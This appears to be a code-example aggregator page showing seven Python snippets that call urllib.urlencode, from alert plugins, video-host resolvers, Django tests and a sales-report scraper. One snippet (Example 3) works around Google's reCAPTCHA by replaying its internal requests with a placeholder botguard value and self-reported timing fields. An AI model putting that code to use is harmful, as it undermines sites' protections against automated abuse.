urllib.urlencode

Here are the examples of the python api urllib.urlencode taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples 7

Example 1

Project: BOSWatch
Source File: BosMon.py
View license
def run(typ,freq,data):
	"""
	This function is the implementation of the BosMon-Plugin.
	It will send the data to an BosMon-Instance via http

	The configuration for the BosMon-Connection is set in the config.ini.
	If an user is set, the HTTP-Request is authenticatet.

	@type    typ:  string (FMS|ZVEI|POC)
	@param   typ:  Typ of the dataset for sending to BosMon
	@type    data: map of data (structure see interface.txt)
	@param   data: Contains the parameter for dispatch to BosMon.
	@type    freq: string
	@keyword freq: frequency is not used in this plugin

	@requires:  BosMon-Configuration has to be set in the config.ini

	@return:    nothing
	"""
	try:
		if configHandler.checkConfig("BosMon"): #read and debug the config

			try:
				#
				# Initialize header an connect to BosMon-Server
				#
				headers = {}
				headers['Content-type'] = "application/x-www-form-urlencoded"
				headers['Accept'] = "text/plain"
				# if an user is set in the config.ini we will use HTTP-Authorization
				if globals.config.get("BosMon", "bosmon_user"):
					# generate b64encoded autorization-token for HTTP-request
					headers['Authorization'] = "Basic {0}".format(base64.b64encode("{0}:{1}".format(globals.config.get("BosMon", "bosmon_user"), globals.config.get("BosMon", "bosmon_password"))))
				logging.debug("connect to BosMon")
				# open connection to BosMon-Server
				httprequest = httplib.HTTPConnection(globals.config.get("BosMon", "bosmon_server"), globals.config.get("BosMon", "bosmon_port"), timeout=5)
				# debug-level to shell (0=no debug|1)
				httprequest.set_debuglevel(0)
			except:
				logging.error("cannot connect to BosMon")
				logging.debug("cannot connect to BosMon", exc_info=True)
				# Without connection, plugin couldn't work
				return

			else:
				#
				# Format given data-structure to compatible BosMon string
				#
				if typ == "FMS":
					logging.debug("Start FMS to BosMon")
					try:
						# BosMon-Telegramin expected assembly group, direction and tsi in one field
						# structure (binary as hex in base10):
						#     Byte 1: assembly group; Byte 2: Direction; Byte 3+4: tactic short info
						info = 0
						# assembly group:
						info = info + 1          # + b0001 (Assumption: is in every time 1 (no output from multimon-ng))
						# direction:
						if data["direction"] == "1":
							info = info + 2      # + b0010
						# tsi:
						if "IV" in data["tsi"]:
							info = info + 12     # + b1100
						elif "III" in data["tsi"]:
							info = info + 8      # + b1000
						elif "II" in data["tsi"]:
							info = info + 4      # + b0100
						# "I" is nothing to do     + b0000

						params = urllib.urlencode({'type':'fms', 'address':data["fms"], 'status':data["status"], 'info':info, 'flags':'0'})
						logging.debug(" - Params: %s", params)
						# dispatch the BosMon-request
						bosMonRequest(httprequest, params, headers)
					except:
						logging.error("FMS to BosMon failed")
						logging.debug("FMS to BosMon failed", exc_info=True)
						return

				elif typ == "ZVEI":
					logging.debug("Start ZVEI to BosMon")
					try:
						params = urllib.urlencode({'type':'zvei', 'address':data["zvei"], 'flags':'0'})
						logging.debug(" - Params: %s", params)
						# dispatch the BosMon-request
						bosMonRequest(httprequest, params, headers)
					except:
						logging.error("ZVEI to BosMon failed")
						logging.debug("ZVEI to BosMon failed", exc_info=True)
						return

				elif typ == "POC":
					logging.debug("Start POC to BosMon")
					try:
						# BosMon-Telegramin expected "a-d" as RIC-sub/function
						params = urllib.urlencode({'type':'pocsag', 'address':data["ric"], 'flags':'0', 'function':data["functionChar"], 'message':data["msg"]})
						logging.debug(" - Params: %s", params)
						# dispatch the BosMon-request
						bosMonRequest(httprequest, params, headers)
					except:
						logging.error("POC to BosMon failed")
						logging.debug("POC to BosMon failed", exc_info=True)
						return

				else:
					logging.warning("Invalid Typ: %s", typ)

			finally:
				logging.debug("close BosMon-Connection")
				try:
					httprequest.close()
				except:
					pass

	except:
		# something very mysterious
		logging.error("unknown error")
		logging.debug("unknown error", exc_info=True)

Example 2

Project: ru
Source File: default.py
View license
def GetVideo(url):
	if re.search('vk\.com|vkontakte\.ru', url):
		http = GET(url)
		soup = bs(http, from_encoding = "windows-1251")
		#sdata1 = soup.find('div', class_ = "scroll_fix_wrap", id = "page_wrap")
		rmdata = soup.find('div', style = "position:absolute; top:50%; text-align:center; right:0pt; left:0pt; font-family:Tahoma; font-size:12px; color:#FFFFFF;")
		if rmdata:
			rmdata = rmdata.find('div', style = False, class_ = False)
			if rmdata.br: rmdata.br.replace_with(" ")
			rmdata = "".join(list(rmdata.strings)).strip().encode('utf-8')
			print rmdata
			vk_email = Addon.getSetting('vk_email')
			vk_pass = Addon.getSetting('vk_pass')
			if 'изъято' in rmdata or not vk_email:
				ShowMessage("ВКонтакте", rmdata, times = 20000)
				return False
			oid, id = re.findall('oid=([-0-9]*)&id=([0-9]*)', url)[0]
			url = 'http://vk.com/video' + oid + '_' + id
			#print url
			from vk_auth import vk_auth as vk
			vks = vk(vk_email, vk_pass)
			crid = vks.get_remixsid_cookie()
			if crid:
				if debug_mode: ShowMessage("ВКонтакте", "Применена авторизация")
			else:
				ShowMessage("ВКонтакте", "Ошибка авторизации")
				print "ошибка авторизации вконтакте"
				return False
			#print crid
			html = GET(url, headers = {"Cookie": crid})
			#print html
			rec = re.findall('var vars = ({.+?});', html)
			if rec:
				rec = rec[0]
				rec = rec.replace('\\', '')
			else:
				ShowMessage("ВКонтакте", "Видео недоступно")
				#print "видео недоступно"
				#if gebug_mode: print html
				return False
			#print 'rec: ' + str(rec)
			fvs = json.loads(rec, encoding = "windows-1251")
			#print json.dumps(fvs, indent = 1).encode('utf-8')
		else:
			rec = soup.find_all('param', {'name': 'flashvars'})[0]['value']
			fvs = urlparse.parse_qs(rec)
		#print json.dumps(fvs, indent = 1).encode('utf-8')
		uid = fvs['uid'][0]
		vtag = fvs['vtag'][0]
		#host = fvs['host'][0]
		#vid = fvs['vid'][0]
		#oid = fvs['oid'][0]
		q_list = {None: '240', '1': '360', '2': '480', '3': '720'}
		hd = fvs['hd'] if 'hd' in fvs else None
		if isinstance(hd, list): hd = hd[0]
		if isinstance(hd, float): hd = str(int(hd))
		print q_list[hd] + "p"
		#burl = host + 'u' + uid + '/videos/' + vtag + '.%s.mp4'
		#q_url_map = {q: burl % q for q in q_list.values()}
		#print q_url_map
		url = fvs['url' + q_list[hd]]
		if isinstance(url, list): url = url[0]
		#url = url.replace('vk.me', 'vk.com')
		sr = urlparse.urlsplit(url)
		if not IsIPv4(sr[1]):
			ipv = '6'
			url = url.replace('v6', '', 1)
		else: ipv = '4'
		if debug_mode: print 'IPv' + ipv
		#print url
		return url
	
	elif re.search('moonwalk\.cc|37\.220\.36\.\d{1,3}|serpens\.nl', url):
		page = GET(url)
		token = re.findall("video_token: '(.*?)'", page)[0]
		access_key = re.findall("access_key: '(.*?)'", page)[0]
		d_id = re.findall("d_id: (\d*)", page)[0]
		#referer = re.findall(r'player_url = "(.+?\.swf)";', page)[0]
		referer = url
		post = urllib.urlencode({"video_token": token, "access_key": access_key, "d_id": d_id, "content_type": 'movie'})
		#print post
		page = GET('http://moonwalk.cc/sessions/create_session', post = post, opts = 'xmlhttp', ref = url, headers = None)
		#print page
		page = json.loads(page)
		if use_ahds:
			url = page["manifest_f4m"]
		else:
			url = page["manifest_m3u8"]
		
		headers = {'User-Agent': UA, 'Connection': 'Keep-Alive', 'Referer': 'http://37.220.36.28/static/player/player_base.swf'}
		url += '|' + urllib.urlencode(headers)
		#print url
		return url
	
	elif 'rutube.ru' in url:
		data = GET(url)
		#print data
		import HTMLParser
		hp = HTMLParser.HTMLParser()
		data = hp.unescape(data)
		match = re.compile('"m3u8": "(.+?)"').findall(data)
		#print match
		if len(match) > 0:
			url = match[0]
			return url
	
	elif re.search('api\.video\.mail\.ru|videoapi\.my\.mail\.ru', url):
		data = GET(url)
		#match = re.compile('videoSrc = "(.+?)",').findall(data)
		match = re.compile('"metadataUrl":"(.+?)"').findall(data)
		if len(match) > 0:
			url = match[0]
		else:
			print "Mail.ru video parser is failed"
			ShowMessage(addon_name, "Mail.ru video parser is failed")
			return False
		data = GET(url, opts = 'headers')
		video_key_c = data[1].getheader('Set-Cookie')
		video_key_c = re.compile('(video_key=.+?;)').findall(video_key_c)
		if len(video_key_c) > 0:
			video_key_c = video_key_c[0]
		else:
			print "Mail.ru video parser is failed"
			ShowMessage(addon_name, "Mail.ru video parser is failed")
			return False
		jsdata = json.loads(data[0])
		vlist = jsdata['videos']
		vlist.sort(key = lambda i: i['key'])
		vdata = vlist[-1]
		url = vdata['url']
		headers = {'Cookie': video_key_c}
		url += '|' + urllib.urlencode(headers)
		return url
	
	elif 'youtube.com' in url:
		if '/embed/' in url:
			if debug_mode: print 'embed'
			video_id = re.findall('embed/(.+)\??', url)[0]
		else:
			finder = url.find('=')
			video_id = url[finder + 1:]
		url = 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % (video_id)
		print url
		return url
	
	elif re.search('moevideo\.net|playreplay\.net|videochart\.net', url):
		o = urlparse.urlparse(url)
		#print o
		uid = re.findall('http://(?:.+?)/framevideo/(.+?)\?', url)
		if uid: uid = uid[0]
		post = urllib.urlencode({"r": '[["file/flv_link",{"uid":"%s"}]]' % (uid)})
		purl = urlparse.urlunsplit((o.scheme, o.netloc, '/data', '' , ''))
		#print purl
		page = GET(purl, post = post)
		#print page
		page = json.loads(page)
		#print json.dumps(page, indent = 1).encode('utf-8')
		url = page['data'][0]['link']
		return url
		
	else:
		ShowMessage(addon_name, "Неизвестный видеохостинг: " + url)
		print "Неизвестный видеохостинг: " + url
		return False

Example 3

Project: ShaniXBMCWork2
Source File: unCaptcha.py
View license
    def processCaptcha(self, key,lang,gcookieJar):
        
        headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
                 ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                 ("Referer", "https://www.google.com/recaptcha/api2/demo/"),
                 ("Accept-Language", lang)];

        botguardstring      = "!A"
        vers, language, jsh = self._collect_api_info()
        millis, rpc         = self._prepare_time_and_rpc()
        
        parent="www.google.com/recaptcha/api2/demo/"
        html =getUrl("https://www.google.com/recaptcha/api2/anchor?"+
                            urllib.urlencode({'k'       : key,
                                 'hl'      : language,
                                 'v'       : vers,
                                 'co' : "aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.",
                                 'size'     : "large", "cb"  : "8shiuzd0nyrv"}),headers=headers)

        token1 = re.search(r'id="recaptcha-token" value="(.*?)">', html)
        
        
        frameurl="https://www.google.com/recaptcha/api2/frame?"+urllib.urlencode({'c'      : token1.group(1),
                                     'hl'     : language,
                                     'v'      : vers,
                                     'bg'     : botguardstring,
                                     'k'      : key})
        html = getUrl(frameurl).decode("unicode-escape")
        
        #html = getUrl("https://www.google.com/recaptcha/api2/reload?k="+key,
        #                         post=urllib.urlencode({'c'      : token1.group(1),
        #                            'hl'     : language,
        #                             'v'      : vers,
        #                             'bg'     : botguardstring,
        #                             'reason'     : "t"}),headers=headers).decode("unicode-escape")
        
       
        #self.log_debug("Token #3: %s" % token3.group(1))
        
        
        
        #captcha_response =getUrl("https://www.google.com/recaptcha/api2/payload?"+
                                              #urllib.urlencode({'c':token3.group(1), 'k':key}),headers=headers)
                                              
        
        
        
        
#        self.log_debug("Token #1: %s" % token1.group(1))


        
        #html=getUrl("http://www.google.com/recaptcha/api/fallback?k=" + key,headers=headers);
        token=""
        roundnum=0
        first=True
        while True:

            message=""
            millis_captcha_loading= int(round(time.time() * 1000))

            
            token2 = re.search(r'"finput","(.*?)",', html)
            #self.log_debug("Token #2: %s" % token2.group(1))

            token3 = re.search(r'"rresp","(.*?)",', html)
            cval=token3.group(1)
            captcha_imgurl="https://www.google.com/recaptcha/api2/payload?"+urllib.urlencode({'c':token3.group(1), 'k':key})
            #response = base64.b64encode('{"response":"%s"}' % captcha_response)
        
            first=True
            if not first:
                payload = re.findall("\"(/recaptcha/api2/payload[^\"]+)",html);
                roundnum+=1
                message =re.findall("<label .*?class=\"fbc-imageselect-message-text\">(.*?)</label>",html);
                if len(message)==0:
                    message =re.findall("<div .*?class=\"fbc-imageselect-message-error\">(.*?)</div>",html)
                if len(message)==0:
                    token = re.findall("\"this\\.select\\(\\)\">(.*?)</textarea>",html)[0];
                    if not token=="":
                        line1 = "Captcha Sucessfull"
                        xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
                    else:
                        line1 = "Captcha failed"
                        xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
                    break
                else:
                    message=message[0]
                    payload=payload[0]


                imgurl=re.findall("name=\"c\"\\s+value=\\s*\"([^\"]+)",html)[0]
                cval=re.findall('name="c" value="(.*?)"',html)[0]
                captcha_imgurl = "https://www.google.com"+payload.replace('&amp;','&')
            
            headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
                 ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                 ("Referer", frameurl),
                 ("Accept-Language", lang)];
               


            html=getUrl(captcha_imgurl,headers=headers,cookieJar=gcookieJar);
            
            #print message
            message=message.replace('<strong>','')
            message=message.replace('</strong>','')
            #captcha_response=raw_input('-->')
            
            oSolver = cInputWindow(captcha = captcha_imgurl,msg = message,roundnum=roundnum)
            captcha_response = oSolver.get()
            #print 'captcha_response',captcha_response
            if captcha_response=="":
                break
            responses=""
            
            if 1==2:
                for rr in captcha_response.split(','):
                    responses += "&response=" + rr;
            else:
                    responses = base64.b64encode('{"response":"%s"}' % captcha_response)
                    responses=responses.replace('=','.')
                    ##responses="eyJyZXNwb25zZSI6IjAsMSwzLDYifQ.."
           
            timeToSolve     = int(round(time.time() * 1000)) - millis_captcha_loading
            timeToSolveMore = timeToSolve#timeToSolve + int(float("0." + str(random.randint(1, 99999999))) * 500)

            html = getUrl("https://www.google.com/recaptcha/api2/userverify?k="+key,
                                    post=urllib.urlencode({'c'       : cval,
                                          'response': responses,
                                          'v'      : vers,
                                          't'       : timeToSolve,
                                          'bg'     : botguardstring,
                                          'ct'      : timeToSolveMore}),headers=headers)
            if first and '["bgdata"' not in html:
               token3 = re.search(r'"uvresp","(.*?)",', html)
               return token3.group(1)
        return token

Example 4

Project: oioioi
Source File: tests.py
View license
    def test_add_problem_to_contest(self):
        ProblemInstance.objects.all().delete()

        contest = Contest.objects.get()
        contest.default_submissions_limit = 42
        contest.save()
        filename = get_test_filename('test_simple_package.zip')
        self.client.login(username='test_admin')
        # Add problem to problemset
        url = reverse('problemset_add_or_update')
        response = self.client.get(url, follow=True)
        url = response.redirect_chain[-1][0]
        self.assertEqual(response.status_code, 200)
        response = self.client.post(url,
                {'package_file': open(filename, 'rb')}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(Problem.objects.count(), 1)
        self.assertEqual(ProblemInstance.objects.count(), 1)

        problem = Problem.objects.get()
        url_key = problem.problemsite.url_key

        # now, add problem to the contest
        url = reverse('add_or_update_problem',
                kwargs={'contest_id': contest.id}) + '?' + \
                        urllib.urlencode({'key': "problemset_source"})
        response = self.client.post(url, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertIn('Add from Problemset', response.content)
        self.assertIn('Enter problem', response.content)
        self.assertIn('s secret key', response.content)
        self.assertIn('Choose problem from problemset', response.content)

        pi_number = 3
        for i in xrange(pi_number):
            url = reverse('add_or_update_problem',
                    kwargs={'contest_id': contest.id}) + '?' + \
                        urllib.urlencode({'key': "problemset_source"})
            response = self.client.get(url,
                       {'url_key': url_key}, follow=True)
            self.assertEqual(response.status_code, 200)
            self.assertIn(str(url_key), response.content)
            response = self.client.post(url,
                        {'url_key': url_key}, follow=True)
            self.assertEqual(response.status_code, 200)
            self.assertEqual(ProblemInstance.objects.count(), 2 + i)

        # check submissions limit
        for pi in ProblemInstance.objects.filter(contest__isnull=False):
            self.assertEqual(pi.submissions_limit,
                             contest.default_submissions_limit)

        # add probleminstances to round
        for pi in ProblemInstance.objects.filter(contest__isnull=False):
            pi.round = Round.objects.get()
            pi.save()

        # we can see model solutions
        pi = ProblemInstance.objects.filter(contest__isnull=False)[0]
        self.check_models_for_simple_package(pi)

        # tests and models of every problem_instance are independent
        num_tests = pi.test_set.count()
        for test in pi.test_set.all():
            test.delete()
        pi.save()

        url = reverse('model_solutions', args=[pi.id])
        response = self.client.post(url, follow=True)
        self.assertEqual(response.status_code, 200)
        for test in ["0", "1a", "1b", "1c", "2"]:
            self.assertNotIn(">" + test + "</th>", response.content)

        for pi2 in ProblemInstance.objects.all():
            if pi2 != pi:
                self.assertEqual(pi2.test_set.count(), num_tests)
                self.check_models_for_simple_package(pi2)

        # reupload one ProblemInstance from problemset
        url = reverse('add_or_update_problem',
                kwargs={'contest_id': contest.id}) + '?' + \
                    urllib.urlencode({'key': "problemset_source",
                                      'problem': problem.id,
                                      'instance_id': pi.id})
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertIn(str(url_key), response.content)
        self.assertNotIn("Select", response.content)
        response = self.client.post(url, {'url_key': url_key}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(ProblemInstance.objects.count(), pi_number + 1)
        self.assertTrue(pi.round)
        self.assertEqual(pi.test_set.count(), num_tests)
        self.check_models_for_simple_package(pi)
        self.assertIn("1 PROBLEM NEEDS REJUDGING", response.content)
        self.assertEqual(response.content
               .count("Rejudge all submissions for problem"), 1)

        # reupload problem in problemset
        url = reverse('problemset_add_or_update') + '?' + \
                    urllib.urlencode({'problem': problem.id})
        response = self.client.get(url, follow=True)
        url = response.redirect_chain[-1][0]
        self.assertEqual(response.status_code, 200)
        response = self.client.post(url,
                {'package_file': open(filename, 'rb')}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(ProblemInstance.objects.count(), pi_number + 1)
        self.assertIn("3 PROBLEMS NEED REJUDGING", response.content)
        self.check_models_for_simple_package(pi)

        # rejudge one problem
        url = reverse('rejudge_all_submissions_for_problem', args=[pi.id])
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertIn("You are going to rejudge 1", response.content)
        response = self.client.post(url, {'submit': True}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content
                 .count("Rejudge all submissions for problem"), pi_number - 1)
        self.assertIn("1 rejudge request received.", response.content)

Example 5

Project: app-sales-machine
Source File: itcscrape.py
View license
def getLastDayReport(username, password, reportDate, verbose=False) :
	logMsg('Initialising session with iTunes connect...', verbose)
	
	s = urlfetch.fetch(url=refererURL,
							method=urlfetch.GET,
							deadline=10)

	logMsg('DONE', verbose)

	logMsg('Locating login form...', verbose)
	# Stop HTMLParser from complaining about the bad HTML on this page
	content = s.content.replace('</font />', '</font>')
	b = BeautifulSoup(content)
	form = b.findAll('form')[0]
	formArgs = dict(form.attrs)

	loginUrl = baseURL + formArgs['action']
	loginData = {
		'theAccountName' : username,
		'theAccountPW' : password,
		'1.Continue.x' : '36',
		'1.Continue.y' : '17',
		'theAuxValue' : ''
	}
	loginArgs = urllib.urlencode(loginData)
	logMsg('DONE', verbose)

	logMsg('Attempting to login to iTunes connect', verbose)
	h = urlfetch.fetch(url=loginUrl,
							method=urlfetch.POST,
							deadline=10,
				   			payload=loginArgs)

	# Stop HTMLParser from complaining about the bad HTML on this page
	content = h.content.replace('</font />', '</font>')
	b = BeautifulSoup(content)
	reportURL = baseURL + dict(b.findAll(attrs={'name' : 'frmVendorPage'})[0].attrs)['action']
	logMsg('DONE', verbose)

	logMsg('Fetching report form details...', verbose)
	reportTypeName = str(dict(b.findAll(attrs={'id' : 'selReportType'})[0].attrs)['name'])
	dateTypeName = str(dict(b.findAll(attrs={'id' : 'selDateType'})[0].attrs)['name'])

	'''
	Captured with Live HTTP Headers:
		9.7=Summary
		9.9=Daily
		hiddenDayOrWeekSelection=Daily
		hiddenSubmitTypeName=ShowDropDown
	'''

	reportData = [
		(reportTypeName, 'Summary'),
		(dateTypeName, 'Daily'),
		('hiddenDayOrWeekSelection', 'Daily'),
		('hiddenSubmitTypeName', 'ShowDropDown')
	]

	reportArgs = urllib.urlencode(reportData)
	h = urlfetch.fetch(url=reportURL,
							method=urlfetch.POST,
							deadline=10,
				   			payload=reportArgs)

	b = BeautifulSoup(h.content)

	reportURL = baseURL + dict(b.findAll(attrs={'name' : 'frmVendorPage'})[0].attrs)['action']

	# Don't know if these change between calls. Re-fetch them to be sure.
	reportTypeName = str(dict(b.findAll(attrs={'id' : 'selReportType'})[0].attrs)['name'])
	dateTypeName = str(dict(b.findAll(attrs={'id' : 'selDateType'})[0].attrs)['name'])
	dateName = str(dict(b.findAll(attrs={'id' : 'dayorweekdropdown'})[0].attrs)['name'])
	logMsg('DONE', verbose)


	logMsg("Fetching report for %s..." % reportDate, verbose)
	'''
	Captured with Live HTTP Headers:
		9.7=Summary
		9.9=Daily
		9.11.1=03%2F12%2F2009
		download=Download
		hiddenDayOrWeekSelection=03%2F12%2F2009
		hiddenSubmitTypeName=Download
	'''

	reportData = [
		(reportTypeName, 'Summary'),
		(dateTypeName, 'Daily'),
		(dateName, reportDate),
		('download', 'Download'),
		('hiddenDayOrWeekSelection', reportDate),
		('hiddenSubmitTypeName', 'Download')
	]

	reportArgs = urllib.urlencode(reportData)
	h = urlfetch.fetch(url=reportURL,
							method=urlfetch.POST,
							deadline=10,
				   			payload=reportArgs)

	# Un-gzipped automatically
	filename = h.headers['filename'].replace('.gz', '')
	return {'filename': filename, 'content': h.content}

Example 6

Project: ADL_LRS
Source File: test_ActivityState.py
View license
    def test_get_with_since_and_regid(self):
        # create old state w/ no registration id
        state_id = "old_state_test_no_reg"
        testparamssince = {"stateId": state_id,
                           "activityId": self.activityId, "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
        teststatesince = {"test": "get w/ since",
                          "obj": {"agent": "test", "stateId": state_id}}
        updated = "2012-06-12:T12:00:00Z"
        put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated,
                               Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)

        self.assertEqual(put1.status_code, 204)
        self.assertEqual(put1.content, '')

        r = self.client.get(self.url, testparamssince,
                            X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r.status_code, 200)

        robj = ast.literal_eval(r.content)
        self.assertEqual(robj['test'], teststatesince['test'])
        self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' %
                         hashlib.sha1(r.content).hexdigest())

        # create old state w/ registration id
        regid = str(uuid.uuid1())
        state_id2 = "old_state_test_w_reg"
        testparamssince2 = {"registration": regid, "activityId": self.activityId,
                            "agent": self.testagent, "stateId": state_id2}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamssince2))
        teststatesince2 = {"test": "get w/ since and registration",
                           "obj": {"agent": "test", "stateId": state_id2}}
        put2 = self.client.put(path, teststatesince2, content_type=self.content_type, updated=updated,
                               Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)

        self.assertEqual(put2.status_code, 204)
        self.assertEqual(put2.content, '')

        r2 = self.client.get(self.url, testparamssince2,
                             X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r2.status_code, 200)

        robj2 = ast.literal_eval(r2.content)
        self.assertEqual(robj2['test'], teststatesince2['test'])
        self.assertEqual(robj2['obj']['agent'],
                         teststatesince2['obj']['agent'])
        self.assertEqual(r2['etag'], '"%s"' %
                         hashlib.sha1(r2.content).hexdigest())

        # create new state w/ registration id
        state_id3 = "old_state_test_w_new_reg"
        testparamssince3 = {"registration": regid, "activityId": self.activityId,
                            "agent": self.testagent, "stateId": state_id3}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamssince3))
        teststatesince3 = {"test": "get w/ since and registration",
                           "obj": {"agent": "test", "stateId": state_id3}}
        put3 = self.client.put(path, teststatesince3, content_type=self.content_type,
                               Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)

        self.assertEqual(put3.status_code, 204)
        self.assertEqual(put3.content, '')

        r3 = self.client.get(self.url, testparamssince3,
                             X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r3.status_code, 200)

        robj3 = ast.literal_eval(r3.content)
        self.assertEqual(robj3['test'], teststatesince3['test'])
        self.assertEqual(robj3['obj']['agent'],
                         teststatesince3['obj']['agent'])
        self.assertEqual(r3['etag'], '"%s"' %
                         hashlib.sha1(r3.content).hexdigest())

        # get no reg ids set w/o old state
        since1 = "2012-07-01T12:30:00+04:00"
        params = {"activityId": self.activityId,
                  "agent": self.testagent, "since": since1}
        r = self.client.get(
            self.url, params, X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        self.assertIn(self.stateId, r.content)
        self.assertIn(self.stateId2, r.content)
        self.assertNotIn(state_id, r.content)
        self.assertNotIn(self.stateId3, r.content)
        self.assertNotIn(self.stateId4, r.content)

        # get reg id set w/o old state
        since2 = "2012-07-01T12:30:00+04:00"
        params2 = {"registration": regid, "activityId": self.activityId,
                   "agent": self.testagent, "since": since2}
        r = self.client.get(
            self.url, params2, X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        self.assertIn(state_id3, r.content)
        self.assertNotIn(state_id2, r.content)
        self.assertNotIn(self.stateId, r.content)
        self.assertNotIn(self.stateId2, r.content)
        self.assertNotIn(self.stateId3, r.content)
        self.assertNotIn(self.stateId4, r.content)

        self.client.delete(self.url, testparamssince, Authorization=self.auth,
                           X_Experience_API_Version=settings.XAPI_VERSION)
        self.client.delete(self.url, testparamssince2, Authorization=self.auth,
                           X_Experience_API_Version=settings.XAPI_VERSION)
        self.client.delete(self.url, testparamssince3, Authorization=self.auth,
                           X_Experience_API_Version=settings.XAPI_VERSION)

Example 7

View license
    def addMediaFile(self, package, contextType='video', encfs=False, dpath='', epath=''):
        thumbnail = self.cache.getThumbnail(self, package.file.thumbnail,package.file.id)
        listitem = xbmcgui.ListItem(package.file.displayTitle(), iconImage=package.file.thumbnail,
                                thumbnailImage=package.file.thumbnail)

        # audio file, not in "pictures"
        if package.file.type == package.file.AUDIO and contextType != 'image':
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayTrackTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'size' : package.file.size })
            listitem.setInfo('Music', infolabels)
            playbackURL = '?mode=audio'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')

        # encrypted file, viewing in "pictures", assume image
        elif package.file.type == package.file.UNKNOWN and contextType == 'image':
            infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot })
            listitem.setInfo('Pictures', infolabels)
            playbackURL = '?mode=photo'
            listitem.setProperty('IsPlayable', 'false')

        # encrypted file, viewing in "video", assume video
        elif package.file.type == package.file.UNKNOWN and contextType == 'video':
            infolabels = decode_dict({ 'title' : package.file.displayTitle() ,  'plot' : package.file.plot, 'size' : package.file.size })
            listitem.setInfo('Video', infolabels)
            playbackURL = '?mode=video'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')
            if float(package.file.resume) > 0:
                listitem.setProperty('isResumable', 1)



        # encrypted file, viewing in "music", assume audio
        elif package.file.type == package.file.UNKNOWN and contextType == 'audio':
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayTrackTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'size' : package.file.size })
            listitem.setInfo('Music', infolabels)
            playbackURL = '?mode=audio'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')

        # audio file, viewing in "pictures"
        elif package.file.type == package.file.AUDIO and contextType == 'image':
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayTrackTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'size' : package.file.size })
            listitem.setInfo('Music', infolabels)
            playbackURL = '?mode=audio'
            listitem.setProperty('IsPlayable', 'false')

        # video file
        elif package.file.type == package.file.VIDEO:
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayShowTitle() ,  'plot' : package.file.plot, 'TVShowTitle': package.file.show, 'EpisodeName': package.file.showtitle, 'season': package.file.season, 'episode': package.file.episode,'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle() ,  'plot' : package.file.plot, 'size' : package.file.size })
            listitem.setInfo('Video', infolabels)
            playbackURL = '?mode=video'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')
            if float(package.file.resume) > 0:
                listitem.setProperty('isResumable', "1")
            if int(package.file.playcount) > 0: #or (float(package.file.resume) > 0 and package.file.duration > 0 and package.file.resume/package.file.duration > (1-self.settskipResume)):
                listitem.setInfo('video', {'playcount':int(package.file.playcount)})

            if int(package.file.resolution[0]) > 0:
                listitem.addStreamInfo('video', {'width': package.file.resolution[1], 'height': package.file.resolution[0], 'duration':package.file.duration})

        # image file
        elif package.file.type == package.file.PICTURE:
